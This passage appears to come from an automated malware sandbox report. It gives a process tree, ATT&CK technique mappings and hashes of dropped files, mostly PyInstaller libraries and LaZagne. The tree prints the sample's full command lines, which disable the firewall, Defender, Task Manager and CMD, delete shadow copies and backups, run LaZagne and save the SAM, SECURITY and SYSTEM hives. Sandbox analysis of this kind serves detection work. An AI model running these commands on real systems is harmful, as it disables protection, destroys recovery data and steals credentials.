    - Suspicious use of AdjustPrivilegeToken
    PID:4984
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state off & netsh advfirewall set currentprofile state off & netsh advfirewall set domainprofile state off & netsh advfirewall set privateprofile state off & netsh advfirewall set publicprofile state off & REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f & powershell -Command Add-MpPreference -ExclusionExtension .exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1264
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    PID:4640
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:752
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set domainprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:4880
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set privateprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:4680
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set publicprofile state off
    3⤵
    - Modifies Windows Firewall
    PID:4596
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:3716
- - C:\Windows\SysWOW64\reg.exe
    REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
    3⤵
    - Modifies registry key
    PID:3728
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5092
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4836
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1840
- C:\Users\Admin\AppData\Roaming\pass.exe
  "C:\Users\Admin\AppData\Roaming\pass.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3500
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c cd %appdata% & laZagne.exe all -oA -output %appdata% & ren credentials*.txt pass.txt
    3⤵
    PID:3844
  - - C:\Users\Admin\AppData\Roaming\LaZagne.exe
      laZagne.exe all -oA -output C:\Users\Admin\AppData\Roaming
      4⤵
      Executes dropped EXE
      PID:3080
    - - C:\Users\Admin\AppData\Roaming\LaZagne.exe
        
        laZagne.exe all -oA -output C:\Users\Admin\AppData\Roaming
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Accesses Microsoft Outlook profiles
        Suspicious behavior: EnumeratesProcesses
        outlook_office_path
        outlook_win_path
        
        PID:4440
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "reg.exe save hklm\sam C:\Users\Admin\AppData\Local\Temp\dpnsevsw"
        6⤵
        
        PID:4508
        
        C:\Windows\system32\reg.exe
        
        reg.exe save hklm\sam C:\Users\Admin\AppData\Local\Temp\dpnsevsw
        7⤵
        
        PID:4812
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "reg.exe save hklm\security C:\Users\Admin\AppData\Local\Temp\bvmmxlywe"
        6⤵
        
        PID:2372
        
        C:\Windows\system32\reg.exe
        
        reg.exe save hklm\security C:\Users\Admin\AppData\Local\Temp\bvmmxlywe
        7⤵
        
        PID:4036
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c "reg.exe save hklm\system C:\Users\Admin\AppData\Local\Temp\eoceqigej"
        6⤵
        
        PID:1032
        
        C:\Windows\system32\reg.exe
        
        reg.exe save hklm\system C:\Users\Admin\AppData\Local\Temp\eoceqigej
        7⤵
        
        PID:1620
- - C:\Windows\SysWOW64\cmd.exe
    "cmd" /c cd %appdata% & del /f credentials* & del /f pass.txt & del /f LaZagne.exe & del /f tool.bin
    3⤵
    PID:660
- C:\Users\Admin\AppData\Roaming\steal.exe
  "C:\Users\Admin\AppData\Roaming\steal.exe"
  2⤵
  - Executes dropped EXE
  PID:3304
- - C:\Users\Admin\AppData\Roaming\steal.exe
    "C:\Users\Admin\AppData\Roaming\steal.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3748
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:1808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:2640
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:2420
- C:\Users\Admin\AppData\Roaming\server.exe
  "C:\Users\Admin\AppData\Roaming\server.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WDfuxLUPdR30.bat" "
    3⤵
    PID:1336
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:4840
  - - C:\Windows\system32\PING.EXE
      ping -n 10 localhost
      4⤵
      Runs ping.exe
      PID:4016
  - - C:\Users\Admin\AppData\Roaming\server.exe
      "C:\Users\Admin\AppData\Roaming\server.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:4200
- C:\Users\Admin\AppData\Roaming\discord.exe
  "C:\Users\Admin\AppData\Roaming\discord.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:4836
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1512

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:3224

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

Filesize
685KB

MD5
081d9558bbb7adce142da153b2d5577a

SHA1
7d0ad03fbda1c24f883116b940717e596073ae96

SHA256
b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

SHA512
2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30802\lazagne.exe.manifest

Filesize
1KB

MD5
6fe7232e13f5f8307c037b54fe0dcc10

SHA1
510075454d9179d1c6669df67f126213aabcb99f

SHA256
4996109560a79774034a05b398d64b1b441c49f0f03682c4683554c59dd47e5c

SHA512
8893febd884f6411025ff9df7d0ef2dbc756baa93903423e805b5e981273838567f2ea60d072d4d98fe9b2f2c25a85800522cebc5e832a3256d4c10605085725

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30802\ucrtbase.dll

Filesize
970KB

MD5
aad2e99881765464c9ad9ccdbe78f0e0

SHA1
8634ce21a2683674210e836822fda448262e2e16

SHA256
e6287f7ba5892c99da70e9785d320a665809ca8e657a64b9fef1e8afcfb6a2f9

SHA512
68d2e898cdd73a3ad41ef3db7a149588a82629ac0628c07606f009bd6a92a62f9816c995b1794c8a957a4f3c55a72fcab17a400a2f55016a0ee8d773a172d002

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI30802\ucrtbase.dll

Filesize
970KB

MD5
aad2e99881765464c9ad9ccdbe78f0e0

SHA1
8634ce21a2683674210e836822fda448262e2e16

SHA256
e6287f7ba5892c99da70e9785d320a665809ca8e657a64b9fef1e8afcfb6a2f9

SHA512
68d2e898cdd73a3ad41ef3db7a149588a82629ac0628c07606f009bd6a92a62f9816c995b1794c8a957a4f3c55a72fcab17a400a2f55016a0ee8d773a172d002

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\VCRUNTIME140.dll

Filesize
106KB

MD5
49c96cecda5c6c660a107d378fdfc3d4

SHA1
00149b7a66723e3f0310f139489fe172f818ca8e

SHA256
69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

SHA512
e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\VCRUNTIME140.dll

Filesize
106KB

MD5
49c96cecda5c6c660a107d378fdfc3d4

SHA1
00149b7a66723e3f0310f139489fe172f818ca8e

SHA256
69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

SHA512
e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\VCRUNTIME140_1.dll

Filesize
48KB

MD5
cf0a1c4776ffe23ada5e570fc36e39fe

SHA1
2050fadecc11550ad9bde0b542bcf87e19d37f1a

SHA256
6fd366a691ed68430bcd0a3de3d8d19a0cb2102952bfc140bbef4354ed082c47

SHA512
d95cd98d22ca048d0fc5bca551c9db13d6fa705f6af120bbbb621cf2b30284bfdc7320d0a819bb26dab1e0a46253cc311a370bed4ef72ecb60c69791ed720168

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\_asyncio.pyd

Filesize
63KB

MD5
511a52bcb0bd19eda7aa980f96723c93

SHA1
b11ab01053b76ebb60ab31049f551e5229e68ddd

SHA256
d1fb700f280e7793e9b0dca33310ef9cd08e9e0ec4f7416854dffaf6f658a394

SHA512
d29750950db2ecbd941012d7fbdd74a2bbd619f1a92616a212acb144da75880ce8a29ec3313acbc419194219b17612b27a1833074bbbaa291cdb95b05f8486ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\_bz2.pyd

Filesize
82KB

MD5
4438affaaa0ca1df5b9b1cdaa0115ec1

SHA1
4eda79eaf3de614d5f744aa9eea5bfcf66e2d386

SHA256
ec91e2b4baca31b992d016b84b70f110ce2b1b2dfd54f5e5bef6270ed7d13b85

SHA512
6992107ac4d2108e477bc81af667b8b8e5439231e7e9f4b15ce4bce1aeea811bc0f1aaa438be3b0e38597760cb504367512809ee1937c4b538a86724ae543ba6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\_bz2.pyd

Filesize
82KB

MD5
4438affaaa0ca1df5b9b1cdaa0115ec1

SHA1
4eda79eaf3de614d5f744aa9eea5bfcf66e2d386

SHA256
ec91e2b4baca31b992d016b84b70f110ce2b1b2dfd54f5e5bef6270ed7d13b85

SHA512
6992107ac4d2108e477bc81af667b8b8e5439231e7e9f4b15ce4bce1aeea811bc0f1aaa438be3b0e38597760cb504367512809ee1937c4b538a86724ae543ba6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\_cffi_backend.cp311-win_amd64.pyd

Filesize
177KB

MD5
210def84bb2c35115a2b2ac25e3ffd8f

SHA1
0376b275c81c25d4df2be4789c875b31f106bd09

SHA256
59767b0918859beddf28a7d66a50431411ffd940c32b3e8347e6d938b60facdf

SHA512
cd5551eb7afd4645860c7edd7b0abd375ee6e1da934be21a6099879c8ee3812d57f2398cad28fbb6f75bba77471d9b32c96c7c1e9d3b4d26c7fc838745746c7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\_ctypes.pyd

Filesize
120KB

MD5
6114277c6fc040f68d25ca90e25924cd

SHA1
028179c77cb3ba29cd8494049421eaa4900ccd0e

SHA256
f07fe92ce85f7786f96a4d59c6ee5c05fe1db63a1889ba40a67e37069639b656

SHA512
76e8ebefb9ba4ea8dcab8fce50629946af4f2b3f2f43163f75483cfb0a97968478c8aaef1d6a37be85bfc4c91a859deda6da21d3e753daefe084a203d839353d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\_ctypes.pyd

Filesize
120KB

MD5
6114277c6fc040f68d25ca90e25924cd

SHA1
028179c77cb3ba29cd8494049421eaa4900ccd0e

SHA256
f07fe92ce85f7786f96a4d59c6ee5c05fe1db63a1889ba40a67e37069639b656

SHA512
76e8ebefb9ba4ea8dcab8fce50629946af4f2b3f2f43163f75483cfb0a97968478c8aaef1d6a37be85bfc4c91a859deda6da21d3e753daefe084a203d839353d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\_decimal.pyd

Filesize
247KB

MD5
be315973aff9bdeb06629cd90e1a901f

SHA1
151f98d278e1f1308f2be1788c9f3b950ab88242

SHA256
0f9c6cc463611a9b2c692382fe1cdd7a52fea4733ffaf645d433f716f8bbd725

SHA512
8ea715438472e9c174dee5ece3c7d9752c31159e2d5796e5229b1df19f87316579352fc3649373db066dc537adf4869198b70b7d4d1d39ac647da2dd7cfc21e8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\_hashlib.pyd

Filesize
63KB

MD5
1524882af71247adecf5815a4e55366a

SHA1
e25014c793c53503bdff9af046140edda329d01b

SHA256
6f7742dfdd371c39048d775f37df3bc2d8d4316c9008e62347b337d64ebed327

SHA512
5b954bb7953f19aa6f7c65ad3f105b77d37077950fb1b50d9d8d337bdd4b95343bac2f4c9fe17a02d1738d1f87eeef73dbbf5cdddcb470588cbc5a63845b188a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\_lzma.pyd

Filesize
155KB

MD5
737119a80303ef4eccaa998d500e7640

SHA1
328c67c6c4d297ac13da725bf24467d8b5e982e3

SHA256
7158c1290ac29169160b3ec94d9c8bcde4012d67a555f325d44b418c54e2cc28

SHA512
1c9920e0841a65b01a0b339c5f5254d1039ef9a16fe0c2484a7e2a9048727f2cc081817aa771b0c574fb8d1a5a49dc39798a3c5e5b5e64392e9c168e1827be7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\_lzma.pyd

Filesize
155KB

MD5
737119a80303ef4eccaa998d500e7640

SHA1
328c67c6c4d297ac13da725bf24467d8b5e982e3

SHA256
7158c1290ac29169160b3ec94d9c8bcde4012d67a555f325d44b418c54e2cc28

SHA512
1c9920e0841a65b01a0b339c5f5254d1039ef9a16fe0c2484a7e2a9048727f2cc081817aa771b0c574fb8d1a5a49dc39798a3c5e5b5e64392e9c168e1827be7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\_multiprocessing.pyd

Filesize
33KB

MD5
2ca9fe51bf2ee9f56f633110a08b45cd

SHA1
88ba6525c71890a50f07547a5e9ead0754dd85b9

SHA256
1d6f1e7e9f55918967a37cbd744886c2b7ee193c5fb8f948132ba40b17119a81

SHA512
821551fa1a5aa21f76c4ae05f44ddd4c2daa00329439c6dadc861931fa7bd8e464b4441dfe14383f2bb30c2fc2dfb94578927615b089a303aa39240e15e89de5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\_overlapped.pyd

Filesize
49KB

MD5
ac053ef737e4f13b02bfa81f9e46170b

SHA1
5d8ebeb30671b74d736731696fedc78c89da0e1f

SHA256
cb68e10748e2efd86f7495d647a2774cea9f97ad5c6fe179f90dc1c467b9280f

SHA512
6ac26f63981dc5e8dfb675880d6c43648e2bbe6711c75dcac20ebe4d8591e88fbfac3c60660ab28602352760b6f5e1cb587075072abd3333522e3e2549bfa02e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\_queue.pyd

Filesize
31KB

MD5
8bbed19359892f8c95c802c6ad7598e9

SHA1
773fca164965241f63170e7a1f3a8fa17f73ea18

SHA256
4e5b7c653c1b3dc3fd7519e4f39cc8a2fb2746e0ecdc4e433fe6029f5f4d9065

SHA512
22ea7667689a9f049fa34ddae6b858e1af3e646a379d2c5a4aef3e74a4ff1a4109418b363c9be960127f1c7e020aa393a47885bc45517c9e9aebe71ec7cb61a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\_socket.pyd

Filesize
77KB

MD5
64a6c475f59e5c57b3f4dd935f429f09

SHA1
ca2e0719dc32f22163ae0e7b53b2caadb0b9d023

SHA256
d03fa645cde89b4b01f4a2577139fbb7e1392cb91dc26213b3b76419110d8e49

SHA512
cf9e03b7b34cc095fe05c465f9d794319aaa0428fe30ab4ddce14ba78e835edf228d11ec016fd31dfe9f09d84b6f73482fb8e0f574d1fd08943c1ec9e0584973

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\_socket.pyd

Filesize
77KB

MD5
64a6c475f59e5c57b3f4dd935f429f09

SHA1
ca2e0719dc32f22163ae0e7b53b2caadb0b9d023

SHA256
d03fa645cde89b4b01f4a2577139fbb7e1392cb91dc26213b3b76419110d8e49

SHA512
cf9e03b7b34cc095fe05c465f9d794319aaa0428fe30ab4ddce14ba78e835edf228d11ec016fd31dfe9f09d84b6f73482fb8e0f574d1fd08943c1ec9e0584973

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\_sqlite3.pyd

Filesize
117KB

MD5
a7df575bf69570944b004dfe150e8caf

SHA1
2fd19be98a07347d59afd78c167601479aac94bb

SHA256
b1223420e475348c0bfb90fae33fc44ce35d988270294158ec366893df221a4b

SHA512
18c381a4ded8d33271cbf0bea75af1c86c6d34cc436f68fb9342951c071c10d84cf9f96a0509c53e5886d47fed5bca113a7f7863f6873583daa7bb6af1aa9afa

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\_ssl.pyd

Filesize
172KB

MD5
a0b40f1f8fc6656c5637eacacf7021f6

SHA1
38813e25ffde1eee0b8154fa34af635186a243c1

SHA256
79d861f0670828dee06c2e3523e2f9a2a90d6c6996bde38201425aa4003119f1

SHA512
c18855d7c0069fff392d422e5b01fc518bbdf497eb3390c0b333ecac2497cd29abbdae4557e4f0c4e90321fba910fc3e4d235ce62b745fa34918f40fa667b713

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\_uuid.pyd

Filesize
24KB

MD5
4faa479423c54d5be2a103b46ecb4d04

SHA1
011f6cdbd3badaa5c969595985a9ad18547dd7ec

SHA256
c2ad3c1b4333bc388b6a22049c89008505c434b1b85bff0823b19ef0cf48065a

SHA512
92d35824c30667af606bba883bf6e275f2a8b5cbfea2e84a77e256d122b91b3ee7e84d9f4e2a4946e903a11293af9648a45e8cfbe247cbdc3bcdea92eb5349c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\base_library.zip

Filesize
1.4MB

MD5
080b0d0a63f2663682a8c422d614fe0b

SHA1
e63662b070ca6c305ad54687680303411f7ff13b

SHA256
eb0a4049f68f1ec0fa55f97475e8209bc5c4836b68162b599d26a1a7195dbf39

SHA512
7e3fc1df03c1a367f2831589c2bd8b986734e77d301dd3efee35ef99a50d1863422e6f4f364c8d9c8a14f74921ab86ec49cfa557e910c728c515548b01d670dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\libcrypto-3.dll

Filesize
4.9MB

MD5
7a6a8c2a8c379b111cdceb66b18d687d

SHA1
f3b8a4c731fa0145f224112f91f046fddf642794

SHA256
8e13b53ee25825b97f191d77b51ed03966f8b435773fa3fbc36f3eb668fc569b

SHA512
f2ef1702df861ef55ef397ad69985d62b675d348cab3862f6ca761f1ce3ee896f663a77d7b69b286be64e7c69be1215b03945781450b186fc02cfb1e4cb226b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\libffi-8.dll

Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\libffi-8.dll

Filesize
38KB

MD5
0f8e4992ca92baaf54cc0b43aaccce21

SHA1
c7300975df267b1d6adcbac0ac93fd7b1ab49bd2

SHA256
eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a

SHA512
6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\libssl-3.dll

Filesize
771KB

MD5
64acb046fe68d64ee475e19f67253a3c

SHA1
d9e66c9437ce6f775189d6fdbd171635193ec4cc

SHA256
b21309abd3dbbb1bf8fb6aa3c250fc85d7b0d9984bf4c942d1d4421502f31a10

SHA512
f8b583981df528cf4f1854b94eff6f51dd9d4be91e6fa6329a8c4435b705457c868ae40ee030fa54bebb646a37b547bc182c9cbf0df9a07fea03a18cf85c6766

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\pyexpat.pyd

Filesize
194KB

MD5
cdcf0e74a32ad7dfeda859a0ce4fcb20

SHA1
c72b42a59ba5d83e8d481c6f05b917871b415f25

SHA256
91fe5b1b2de2847946e5b3f060678971d8127dfd7d2d37603fdcd31bd5c71197

SHA512
c26fdf57299b2c6085f1166b49bd9608d2dd8bc804034ebb03fb2bba6337206b6018bf7f74c069493ffae42f2e9d6337f6f7df5306b80b63c8c3a386bce69ea6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\pyexpat.pyd

Filesize
194KB

MD5
cdcf0e74a32ad7dfeda859a0ce4fcb20

SHA1
c72b42a59ba5d83e8d481c6f05b917871b415f25

SHA256
91fe5b1b2de2847946e5b3f060678971d8127dfd7d2d37603fdcd31bd5c71197

SHA512
c26fdf57299b2c6085f1166b49bd9608d2dd8bc804034ebb03fb2bba6337206b6018bf7f74c069493ffae42f2e9d6337f6f7df5306b80b63c8c3a386bce69ea6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\python311.dll

Filesize
5.5MB

MD5
58e01abc9c9b5c885635180ed104fe95

SHA1
1c2f7216b125539d63bd111a7aba615c69deb8ba

SHA256
de1b95d2e951fc048c84684bc7df4346138910544ee335b61fc8e65f360c3837

SHA512
cd32c77191309d99aeed47699501b357b35669123f0dd70ed97c3791a009d1855ab27162db24a4bd9e719b68ee3b0539ee6db88e71abb9a2d4d629f87bc2c081

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\python311.dll

Filesize
5.5MB

MD5
58e01abc9c9b5c885635180ed104fe95

SHA1
1c2f7216b125539d63bd111a7aba615c69deb8ba

SHA256
de1b95d2e951fc048c84684bc7df4346138910544ee335b61fc8e65f360c3837

SHA512
cd32c77191309d99aeed47699501b357b35669123f0dd70ed97c3791a009d1855ab27162db24a4bd9e719b68ee3b0539ee6db88e71abb9a2d4d629f87bc2c081

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\select.pyd

Filesize
29KB

MD5
653bdccb7af2aa9ccf50cb050fd3be64

SHA1
afe0a85425ae911694c250ab4cb1f6c3d3f2cc69

SHA256
e24a3e7885df9a18c29ba058c49c3adcf59e4b58107847b98eca365b6d94f279

SHA512
07e841fda7a2295380bfa05db7a4699f18c6e639da91d8ee2d126d4f96e4cddaedbd490deb4d2a2e8e5877edfff877693f67a9dc487e29742943e062d7be6277

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\select.pyd

Filesize
29KB

MD5
653bdccb7af2aa9ccf50cb050fd3be64

SHA1
afe0a85425ae911694c250ab4cb1f6c3d3f2cc69

SHA256
e24a3e7885df9a18c29ba058c49c3adcf59e4b58107847b98eca365b6d94f279

SHA512
07e841fda7a2295380bfa05db7a4699f18c6e639da91d8ee2d126d4f96e4cddaedbd490deb4d2a2e8e5877edfff877693f67a9dc487e29742943e062d7be6277

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\sqlite3.dll

Filesize
1.4MB

MD5
b49b8fde59ee4e8178c4d02404d06ee7

SHA1
1816fc83155d01351e191d583c68e722928cce40

SHA256
1afd7f650596ad97fcf358b0e077121111641c38ca9d53132bab4c9588cf262f

SHA512
a033ce87c2e503b386fb92aa79a7ec14d6c96e4a35d0cb76d4989bacd16f44c4ed5ac4e13057f05f9d199a3fd8545b9a25296515ec456f29c464d949ff34942a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI33042\unicodedata.pyd

Filesize
1.1MB

MD5
1905b5d0f945499441e8cd58eb123d86

SHA1
117e584e6fcc0e8cfc8e24e3af527999f14bac30

SHA256
b1788b81fa160e5120451f9252c7745cdde98b8ce59bf273a3dd867bb034c532

SHA512
ed88cd7e3259239a0c8d42d95fa2447fc454a944c849fa97449ad88871236fefdafe21dbfa6e9b5d8a54ddf1d5281ec34d314cb93d47ce7b13912a69d284f522

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i5l1axbk.yos.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\wlapyktqm

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\xllcnxmiv

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Roaming\LaZagne.exe

Filesize
11.3MB

MD5
282df7bcb720a5b6f409caf9ccda2f75

SHA1
0e62d10ff194e84ed8c6bd71620f56ef9e557072

SHA256
3cc5ee93a9ba1fc57389705283b760c8bd61f35e9398bbfa3210e2becf6d4b05

SHA512
74bbcefb87c037ec93312f67b739c2486258d83e0fb7628352a1dd482c0277a82073427856c0848cda451b7322faab0ae2e6878501c2867827ce6bd9798f3229

Download Submit
C:\Users\Admin\AppData\Roaming\LaZagne.exe

Filesize
11.3MB

MD5
282df7bcb720a5b6f409caf9ccda2f75

SHA1
0e62d10ff194e84ed8c6bd71620f56ef9e557072

SHA256
3cc5ee93a9ba1fc57389705283b760c8bd61f35e9398bbfa3210e2becf6d4b05

SHA512
